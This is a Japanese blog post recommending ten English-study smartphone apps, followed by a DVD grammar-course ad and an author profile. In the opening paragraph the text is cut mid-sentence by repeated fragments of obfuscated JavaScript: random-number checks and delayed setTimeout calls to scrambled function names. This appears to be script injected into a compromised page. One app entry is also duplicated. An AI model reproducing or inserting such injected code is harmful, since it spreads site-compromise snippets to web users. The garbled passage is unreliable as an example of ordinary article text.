スキマ時間に手軽に勉強!おすすめの英語系スマホアプリ10選

どうもみなさんこんにちは。英文法勉強中の桃太郎です。

「英語を勉強したいけど、時間がない。。」

そんなふうに思っているなら、ぜひともスマホアプリandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}がおすすめです。スマホ1つあれば、いつでもどこでもスキマ時間などに勉強できてとても便利です。

様々な英語系アプリがありますが、今回はその中でも特におすすめのアプリを厳選して10個ご紹介します。(※iOS用とAndroid用で、ダウンロードページへのリンクをそれぞれ載せてます。)

 

スキマ時間に手軽に勉強!おすすめの英語系アプリ10選

Google翻訳

語学学習ではまず辞書は必須でしょう。Google翻訳は個人的には最も使いやすい辞書。ワンタップで確認用の再翻訳もでき、音声入力や手書き入力にも対応しています。ブラウザ版と違って翻訳した内容が履歴に残り、あとから見直すこともできます。

 

Google翻訳

語学学習ではまず辞書は必須でしょう。Google翻訳は個人的には最も使いやすい辞書。ワンタップで確認用の再翻訳もでき、音声入力や手書き入力にも対応しています。ブラウザ版と違って翻訳した内容が履歴に残り、あとから見直すこともできます。

 

TOEIC重要英単語

目標の点数別にTOEICによくでてくる英単語を学ぶことができます。テスト形式で問題を解いていき、間違えた単語を後からでもチェックできて便利です。電車の中で気軽にTOEIC対策ができます。

 

NHK WORLD RADIO JAPAN

英語ニュースが聴きたい方はこちらがおすすめ。「NHKワールドラジオ日本」の公式アプリです。日本国内で取り上げられるニュースを英語で聴けるので、内容が掴みやすくリスニングの題材としてはピッタリです。

 

Umano

「Umano」もおすすめのニュースアプリ。アメリカの有名メディアから集められた旬なニュースを聞き流すことができます。ネイティブ向けで読み上げスピードは速いので、こちらは上級者向けだと思います。

 

早射ち英文法

英単語を並び替えるゲームをすることで楽しく文法を学ぶことができます。中学文法から高校文法まで幅広く対応しており、各項目ごとに5つの例文が用意され、何回も復習できます。

 

iKnow

英語学習を総合的にサポートしてくれる『iKnow』。自分のレベル、目的に合わせてコースを選択して、学習時間や頻度を管理することができます。学習できる範囲が広く、基礎から応用レベルまであります。

 

MOKAえいご漬け

スパルタ教育で意地でも英会話力を身につけたい方におすすめ。英語的発想力が身に付く学習方法をもとに構成されているそうです。

 

Johnny Grammar’s Word Challenge

文法や語彙に関するクイズに答えていく形式で、楽しくボキャブラリーを増やしていけます。

 

TED

「TED」(Technology Entertainment Design)は、様々な分野の著名人・専門家が行うプレゼンテーション。そのプレゼンを無料で聞くことができるアプリです。日本語字幕と英語字幕どちらでも視聴可能です。

 

EnglishUpgrader

「EnglishUpgrader」は、TOEICを運営する国際ビジネスコミュニケーション協会が開発した公式アプリ。日常生活やビジネス等のさまざまな場面で使われている英会話が学べます。おもな構成は、英会話エピソード、フレーズ集、フレーズ解説、理解度チェッククイズなどです。

 

さいごに

いかがでしょうか? 忙しくてなかなか英語が勉強できない方はぜひともアプリを利用して、スキマ時間などに勉強していきましょう!

book-image
 

TOEIC文法に特化した教材がここに!

3時間レッスンを驚き価格でご提供!

有名先生のリアル授業をDVDでお届け!

3時間の40レッスンのDVD教材がたったの1,800円!(税抜き)

購入はこちら! 購入はこちら!

この記事を書いた人

桃太郎

桃太郎

このサイトの管理人であり、モモセ先生のDVDで英文法を勉強中の桃太郎です。過去カナダに2年間在住していたことがありますが、『文法なんて別にどうでもいいでしょ!』と英文法を完全になめきっていました......このブログでは英文法をいま一度学び直している僕が、気づいたことや大事だと思ったことなどをみなさんにシェアしていきます。

桃太郎が書いた記事一覧はこちら

Facebookコメント